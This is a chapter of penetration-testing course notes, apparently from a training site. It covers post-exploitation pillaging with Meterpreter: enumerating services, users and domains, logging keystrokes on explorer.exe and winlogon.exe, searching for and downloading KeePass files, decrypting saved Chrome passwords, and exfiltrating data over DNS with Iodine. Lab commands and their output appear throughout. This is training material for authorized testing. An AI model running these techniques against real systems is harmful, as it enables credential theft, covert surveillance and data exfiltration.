Pillaging / Data Harvesting
6.3. Pillaging / Data Harvesting
Once we have built our way into the victim machine, we can move on to the next phase: Data Harvesting / Pillaging.
Pillaging is the step in which you access sensitive data and intellectual property of the target organization.
Demonstrating the feasibility of an external hacker accessing this information might be the goal of the overall engagement, so this phase is critical.
However, according to the type of machine you have compromised, you may or may not find what you are looking for. This presents the need to further exploit and infiltrate the network.
Therefore in this step we will also harvest data and information necessary for this purpose.
This encompasses getting local information such as files, enumerating credentials, accounts, IM logs, and more, but also network information such as internal network blocks in use, domains, intranet servers, shared hard drives, printers, repositories, and so on.
Network information will also be used in the Mapping the internal network phase.
Important Since there is an infinite list of commands that we can run on the target machines, we will not list all of them here. Instead, we will see the most important and then we will give you some references at the end of this section.
The important thing to remember here is that we need to get as much [information][http://www.pentest-standard.org/index.php/Post_Exploitation#Pillaging] as we can: system info, applications, services, networks, documents, messaging, and so on.
In the next sections we will see a list of scripts and commands related to data harvesting, that a penetration testers could use through a meterpreter session or shell.
Notice that we have already seen some of these scripts in previous phases, but for different purposes. We will still mention them here since they are very important for the success of this step.
Let us start harvesting basic information about the system.
sysinfo
Withsysinfo
command we are able to get basic information about the remote system. Notice that the script works both on Windows and Linux OS.meterpreter > sysinfo Computer : ELS OS : Windows 7 (Build 7601, Service Pack 1) Architecture : x64 (Current Process is WOW64) System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/win32
getuid
Withgetuid
, we can check the user that we are running as on the target machine.meterpreter > getuid Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000
meterpreter > getuid Server username: els\els
Starting from this information, we can already start making assumption about the role of the victim machine.
For example, if the previous command show us that the victim machine is a server, one of the most important things to check is which services are running on it.
In other words, we have to figure out the role of the machine in the remote network.
You should try to get answers to questions like:
Is this a workstation?
Which department is it from?
R&D?
Marketing?
...
Is this a server?
What server?
Mail server?
Web server?
RADIUS?
...
During the Pillaging step, we should be able to give an accurate answer to those questions according to the information we get on the system.
Let us start uncovering some of the commands we can run to collect more information.
Metasploit already implements some enumeration scripts that could be used for this purpose: - run /post/windows/gather/
Result: meterpreter > run post/windows/gather/ Display all 106 possibilites? (y or n) run post/windows/gather/arp_scanner run post/windows/gather/bitcoin_jacker run post/windows/gather/cachedump run post/windows/gather/checkvm
- run /post/linux/gather/
Result: run post/windows/gather/arp_scanner run post/windows/gather/bitcoin_jacker run post/windows/gather/cachedump run post/windows/gather/checkvm
Notice that the previous scripts contain predefined sets of shell commands that will be run on the target machine in order to get the correct information. (see img-195?)
Although they are very useful and will save us a lot of time, we can use Windows or Unix commands from an interactive shell in order to get the same results. For example, let us first run the enum_services
scripts and then check how we can get similar results from a shell. ``` [*] Listing Services Info for matching services, please wait... [+] New service credentials detected: AeLookupSvc is running as `` [+] New service credentials detected: ALG is running as 'NT AUTHORITY\LocalService' [+] New service credentials detected: aspnet_state is running as 'NT AUTHORITY\NetworkService' Services ========
Name Credentials Command Startup
---- ----------- ------- -------
ALD NT AUTHORITY\LocalService Manual C:\Windows\System32\alg.exe
AeLookupSvc localSystem Manual C:\Windows\System32\svchost.exe
ApoIDSvc NT Authority\LocalService Manual C:\Windows\System32\svchost.exe
```
As you can see, with a single command we het a list of all services on the remote machine, the user associated with each of them, the startup type, and also the path to the binary.
The same information can be obtained on the machine, by opening the *Services* configuration windows (see img-197).
Important It is important to know that many post exploitation scripts are implemented as modules and can be used outside the meterpreter session.
We just need to select the module with the `use` command, configure its options with `set`, and then execute the module with `run`.
Let us see an example based on `enum_services`.
We will get the same results obtained before, but we can also configure the module according to our needs.
```
msf > use/post/windows/gather/enum_services
msf post(enum_services) > show options
Name Current Setting Required Description
---- --------------- -------- -----------
CRED no String to search credentials for
PATH no String to search path for
SESSION 2 yes The session to run this module on
TYPE All yes Service startup Option (Accepted: All, Auto, Manual, Disabled)
msf post(enum_services) > run
```
As we said before, post exploitation scripts and modules usually contain and execute a well-defined set of OS commands. In other words, we can get similar information by running the correct commands from a shell terminal on the target machine.
wmic
In the previous case we can get services information with thewmic
command. As we can see we get similar information. Example:C:\Users\els\Downloads>wmic service get Caption,StartName,State,pathName wmic service get Caption,StartName,State,pathname Caption StartName State PathName Application Experience localSystem Running C:\Windows\system32\svchost.exe -k netsvcs Application Layer Gateway Service NT AUTHORITY\LocalService Stopped C:\Windows\system32\alg.exe Application Identity NT Authority\LocalService Stopped C:\Windows\system32\svchost.exe -k LocalServcieAndNoImpersonation
net start
Another useful command that we can use to list services that are currently running isnet start
. Inspecting the results of these commands gives us a better idea of the machine role. Inspecting the results of these commands gives us a better idea of the machine role. For example, services likeDNS
orIIS
tell us that the exploited machine have a server role.C:\Windows\system32> net start net start These Windows services are started: Application Experience Application Information Background Intelligent Transfer Service Base Filtering Service ... Remote Desktop Configuration Remote Desktop Services Remote Desktop Services UserMode Port Redirector
service --status-all
As you can imagine, these commands rely on the OS we are dealing with. For example if we want a list of services running on the exploited Linux machine, we will runservice --status-all
Example:
meterpreter > shell Process 9852 created. Channel 1 created. $ service --status-all [+] acpid [-] anacron [+] apache
ps
In addition to services running on the machine, listing running process could also be very useful to understand the role of the machine. The easiest way to check them is by running theps
command on the meterpreter.
Some critical information to retrieve in a Windows networked environment, is if the compromised machine is part of a domain, or even, if it is a domain controller.
net view/domain
To gather this information we can run the commandnet view/domain
or run the script namedenum_domains
.Here is an example of what we may get. In this case the machine is in the domain
ELSLAB
and we also know the name of the Domain Controller.C:\Users\els\Downloads>net view /domain net view /domain Domain ----------------------------------------------------------------------------- ELSLAB The command completed successfully. C:\Users\els\Downloads>^C Terminate channel 2? [y/N] y meterpreter > run post/windows/gather/enum_domains [*] Enumerating DCs for ELSLAB [+] Domain Controller: WIN-2QH87UNDLTR
net group "Domain Controllers" /domain
We can also print the list of Domain Controllers with the following command:C:\Windows\system32>net group "Domain Controllers" /domain net group "Domain Controllers" /domain Group name Domain Controllers Members Comment All domain controllers in the domain ---------------------------------------------------------------------------- WIN-2QH87UNDLTR$ The command completed successfully.
Let us now focus on which command we can use to get information about users.
net user
(Windows) andcat /etc/passwd
(Linux) With these commands we are able to list users on the system.C:\Windows\system32>net user net user User accounts for \\ ----------------------------------------------------------------------------- Administrator els els_user EveUser Guest stduser user The command completed with one or more errors.
# cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/sbin/nologin
run post/windows/gather/enum_ad_users
Notice that since the Windows machine is part of a domain, we can also use meterpreter scripts to enumerate accounts and other information in the default active domain:meterpreter > run post/windows/gather/enum_ad_users Domain Users ============ sAMAccountName name userPrincipalName userAccountControl lockoutTime mail primarygroupid -------------- ---- ----------------- ------------------ ----------- ---- -------------- Administrator Administrator 512 513 Guest Guest 66082 514
net user /domain
Similar information can be obtained with thenet user /domain
command. Remember that most of the scripts automate and organize information that can be gathered with shell commands.C:\Windows\system32>net user /domain net user /domain The request will be processed at a domain controller for domain eLSLab.local. User accounts for \\WIN-2QH87UNDLTR.eLSLab.local ---------------------------------------------------------------------------- Administrator Francesco Guest krbgt The command completed with one or more errors.
net localgroup
Moreover we can check which groups exist on the machine or which users are within a group with thenet localgroup [group_name]
command.C:\Usrs\els\Downloads>net localgroup net localgroup Aliases for \\ELS ---------------------------------------------------------------------------- *Administrators *Backup Operators *Cryptographic Operators *Distributed COM Users
C:\Usrs\els\Downloads>net localgroup Administrators net localgroup Administrators Alias name Administrators Comment Administrators have completed and unresticted Members ---------------------------------------------------------------------------- *Administrators *Backup Operators *Cryptographic Operators *Distributed COM Users
net share
andenum_shares
The last command we will see is useful to display all the resources shared on the victim.We can use
net share
from the command prompt orenum_share
from meterpreter.C:\Users\els\Downloads>net share net share Share name Resource Remark ---------- -------- ------ C$ C:\ Default share IPC$ Remote IPC ADMIN$ C:\Windows Remote Admin test C:\Users\els\Documents\test Users C:\Users The command completed successfully
meterpreter > run enum_shares [*] [*] The following shares were found: [*] Name: test [*] Path: C:\Users\els\Documents\test [*] Type: 0 [*] [*] Name: Users [*] Path: C:\Users [*] Type:0 [*] [*] Recent UNC paths entered in Run Dialog found: [*] \\192.168.102.147\1
The list of commands in this section is just a small fraction of the ones that are available in Meterpreter or in the OS shells.
For example we did not yet gather networking information such as IP addresses, ARP tables, DNS, current connections, and so on. In addition to this information, we also still need to check installed applications and local files.
as you have already seen, you have a number of different commands and methods to retrieve information, depending on the victim OS.
Showing all of them is merely impossible, but fellow pentesters have shared a few documents with us listing all potential commands for:
At the following [link][https://github.com/mubix/post-exploitation-wiki] you can find a few more links containing post-exploitation commands. You can also download them locally and access it from a web browser.
Notice that there are many other lists available online. [Here][http://tim3warri0r.blogspot.it/] and [Here][https://n0where.net/linux-post-exploitation/] you can find a few more commands to run on Windows and Linux/Unix/BSD machine.
We strongly suggest you take a look at these documents in order to understand what type of commands and information you may need to gather from exploited machines.
Before seeing how to harvest files from the victim, it is useful to know that Metasploit implements scripts that automatically retrieve information from the system. The two main scripts that we can use against Windows machines are
scraper
harvests system info including network shares, registry hives, and password hasheswinenum
retrieves all kinds of information about the system including environment variables, network interfaces routing, user accounts, and much more.
If we inspect the code of these 2 scripts, we can see the list of commands that they will run on the remote machine (see img-218)
Notice that they will automatically save all information gathered into local files, so we can inspect them later. meterpreter > run winenum [*] Running Windows Local Enumeration Meterpreter Script [*] New session on 192.168.102.157:47451... [*] Saving general report to /root/.msf5/logs/scripts/winenum/ELS_20160303.5433/ELS_20160303.5433.txt [*] Checking if ELS is a Virtual Machine ........ [*] This is a VMware Workstation/Fusion Virtual Machine [*] UAC is Disabled [*] Running Command List ... [*] running command arp -a [*] running command cmd.exe /c set [*] running command ipconfig /all
Once we have information about the system, networks, users, groups, services, and so on, we can start getting not only actual files and documents, but also keystrokes. We will look for usernames, passwords, IM logs, private documents, and so on.
Metasploit offers some great scripts that could be used in this step. For example with screenshoot
command we are able to get the screen of the victim. (see img-221)
Another way to get sensitive information from the target machine is by running a keylogger. Although there are many keylogger tools that we can use and install on the remote machine, Metasploit also offers a few scripts to do this: keyscan_start
and keylogrecorder
It is important to know that depending on the privileges we have on the remote machine and the process we are attached to, different keystrokes can be logged.
For example, if we want to log credentials typed when the user unlocks the screen we will have to attach the session to the `winlogon.exe` process (which runs on SYSTEM).
On the other side, if we want to dump keystrokes while the user uses applications and so on, we will have to attach the process `explorer.exe` (which runs on user level).
Let us see how the 2 script works:
keyscan_start
,keystart_dump
,winlogon.exe
The first script we are going to use iskeystart_scan
. Notice that we already migrated inexplorer.exe
meterpreter > getpid Current pid: 3012 meterpreter > keyscan_start Starting the keystroke sniffer... meterpreter >
Once the sniffer is running we just have to wait for the user to type something on the keyboard.
Notice that the keystrokes will not be automatically printed on the screen. Instead we have to run
keyscan_dump
to see them.meterpreter > keyscan_dump Dumping captured keystrokes... bank of america <Return> elstarget <Tab> MyStringPwd23454_ <Return>
As we can see, it seems the user typed
bank of america
and then some credentials. While the sniffer is running, we can dump the keystrokes by simply executingkeyscan_dump
. To stop the sniffer we just need to runkeyscan_stop
Let's now migrate to
winlogon.exe
and try to dump the user login credentials.PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 500 412 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\syst meterpreter > getpid Current pid: 500 meterpreter > keyscan_start Starting the keystroke sniffer... meterpreter > keyscan_dump Dumping captured keystrokes... meterpreter > keyscan_dump Dumping captured keystrokes... meterpreter > keyscan_dump Dumping captured keystrokes... <Ctrl> <LCtrl> <Insert> <Ctrl> <LCtrl> <Alt> <LMenu> <Delete> els <Return> meterpreter >
keylogrecorder
The next script we want to use iskeylogrecorder
:meterpreter > run keylogrecorder -h Keylogger Recorder Meterpreter Script This script will start the Meterpreter Keylogger and save all keys in a log file for later analysis. To stop capture hit Ctrl-C Usage: OPTIONS: -c <opt> Type of key capture. (0) for user key presses, (1) for winlogon credential capture, or (2) for no migration. Default is 2. -h Help menu -k Kill old Process -l Lock screen when capturing Winlogon credentials -t <opt> Time interval in seconds between recollection of keystrokes, default 30 seconds
As we can see, with the
-c
option we can instruct the script which type of key to capture (user orwinlogon
)Different form previous script,
keylogrecorder
automatically migrates to the correct process, but it also stores all the keystrokes into a local file.meterpreter > run keylogrecorder -c 0 [*] explorer.exe Process found, migrating into 3012 [*] Migration Successful!! [*] Starting the keystroke sniffer... [*] Keystrokes being saved in to /root/.msf5/logs/scripts/keylogrecorder/192.168.102.157_20160303.4055.txt [*] Recording
In order to see the keystrokes we just need to open the file stored in the Metasploit logs folder.
Now let's see a few commands that allows us to list files, create files, folders, move between directories, and so on. From the meterpreter help manual we can see the list of commands that are implemented. ``` Stdapi: File system Commands ============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
...
```
It does not matter the OS of the exploited machine. These commands work the same way. For example, with the commands pwd
and getwd
we are able to get the working directory and then we could list files.
Thanks to these commands (`search`, `download`, etc) we are able to search and download files like Web Browser cache, IM logs, documents, email files, PGP keys, specific program files like KeePass databases, and so on.
Let's suppose we want to search for a specific file extension such as KeePass database file. We can do this with the following command: search -d C:\\Users\\els\\ -f *.kdbx
Description: - -d
is the path where to begin searching from - -f
is the file pattern to search
Once we have located the file we need, we can download it to our machine with the command download
. We can use this command to retrieve all the files we need. For example we can search for IM logs like Skype, Windows Live Messenger, software configuration files such as FTP clients, SVN clients, and so on, and then download the files locally in order to inspect them.
As you can imagine, the kind of files to retrieve differs from victim to victim: web browser history is a good place to look, since you can find internal corporate network information.
Once we have downloaded and analyzed files on the remote file system, we can move on with our investigation and start searching for credentials stored on the system. We can use Metasploit modules or use third party software ([Nirsoft][http://www.nirsoft.net/] has many of these tools for windows)
The modules that Metasploit offers can be found in the `post/windows/gather/credentials` path:
```
meterpreter > run post/windows/gather/credentials/
run post/windows/gather/credentials/bulletproof_ftp
run post/windows/gather/credentials/coreftp
run post/windows/gather/credentials/credential_collector
...
```
Besides scripts stored in the credentials folder, it is always useful to give a look to the scripts stored in the parent path.
- `enum_chrome`
For example the `enum_chrome` script can be used tot gather credentials stored in Google Chrome.
```
meterpreter > run post/windows/gather/enum_chrome
[*] Running as user 'els\els' ...
[*] Extracting data for user 'els' ...
...
```
At the end of the output we can see that the script was able to decrypt the data. If we inspect the file created, we will see the plain-text credentials stored in it:
```
[*] => Google Now
[*] Decrypted data saved in: /root/.msf5/loot/201603033113839_default_192.168.102.157_chrome.decrypted_412961.txt
```
| <br>
V
```
stduser@les:~$ cat /root/.msf5/loot/201603033113839_default_192.168.102.157_chrome.decrypted_412961.txt
Decrypted data
==============
Name Decrypted Data Origin
---- -------------- ------
elstarget@gmail.com Vbk19jlaDry9AgfgAY https://accounts.google.com/ServiceLoginAuth
```
- `multi`
Notice that other gathering scripts are available under the path `post/multi/gather`
```
meterpreter > run post/multi/gather
run post/multi/gather/apple_ios_backup
run post/multi/gather/check_malware
run post/multi/gather/dbvis_enum
run post/multi/gather/dns_bruteforce
...
```
enum_application
As you can imagine, knowing what software is installed on the machine is important. As you already know, we can list them with theenum_application
script:meterpreter > run post/windows/gather/enum_applications [*] Enumerating applications installed on ELS Installed Applications ====================== Name Version ---- ------- Apple Software Update 2.1.3.127 Apple Software Update 2.1.3.127 GnuWin32: Grep-2.5.4 2.5.4 GnuWin32: Grep-2.5.4 2.5.4 Google Chrome 48.0.2564.116 Google Chrome 48.0.2564.116 ...
Instead of using meterpreter scripts, we could also use external tools. In our lab environment, we will use the Web Browser Pass View tool to extract credentials saved in the web browser installed on the target machine.
As you can imagine the task to perform, the commands, the tools, and the paths to check, strongly depends on the OS you are pentesting.
Moreover, the role of the victim machine on the remote network will suggest what to look for. (see vid-242) In the following video we will see how to use the previous commands in order to gather as much information as we can from the target machine.
In our case we will gather them from an employee workstation, so we will try to get system, user, network information, installed applications, account credentials, IM logs, and so on.
6.3.1. Exfiltration over DNS with Iodine (DNS Tunnelling)
Most of the time, with real world-attacks the objective of malicious actors is not only compromise systems for use of nefarious purposes, but it also often their objective to exfiltrate sensitive information, and a lot of the time, they do so over protocols that are not typically monitored.
One method that has been increasingly seen in the wild is the use of DNS for data exfiltration, also known as "DNS Tunneling".
This is a popular method due to the fact that many organizations are not logging or alerting on anomalous DNS traffic which makes it a go-to vector for exfiltrating data out of the target network, and over often under-monitored "channel".
One tool that can be used for this purpose is known as "Iodine".
Not only iodine can help with exfiltrating data from a target environment, but it can also help in penetration testing engagements that restrict access to the internet due to authenticated proxies for which we don't have credentials, or can also be used for bypassing captive portals, such as seen commonly in wireless networks.
In a typical scenario with DNS Tunneling, the attacker DNS tunnel client component initiates a connection to the attacker-controlled DNS tunnel server component through an organization's DNS server, and can be generalized with the diagram below (see img-248): Attacker-----------DNS Tunnel--------------Attacker-Controlled (DNS Tunnel Client Component) (DNS Tunnel Server Component) | ^ | | ----------> FooCorp DNS Server-------------------
Once the DNS tunnel is established, the client transmits all network traffic, encoded, and in the form of DNS queries, typically as [TXT][https://en.wikipedia.org/wiki/TXT_record] records, through the tunnel, which is then decoded at the other end by the server component or attacker-controlled "DNS Server".
Information regarding exactly how this works, can be found [here](http://beta.ivc.no/wiki/index.php/DNS_Tunneling).
From there, we can trivially tunnel all of our traffic through an SSH socks server, completely over DNS, bypassing firewalls or any authenticated proxies along the way.
Some pre-requisites for using Iodine to create a DNS tunnel for exfiltration are: 1. Control over a domain name that you own and its DNS configuration, and; 2. An IP address to act as the authoritative Name Server for your domain name for which you have SSH access to as well
Since DNS Tunneling requires a client/server model, you'll want those 2 pieces in place in order to experiment with this method.
In the video we'll show how we can configure a DNS tunneling implementation with Iodine using a domain name we have registered with GoDaddy, in addition to using IP address hosted on a VPS provider to act our exfiltration tunnel endpoint.
(see vid-253)
Last updated
Was this helpful?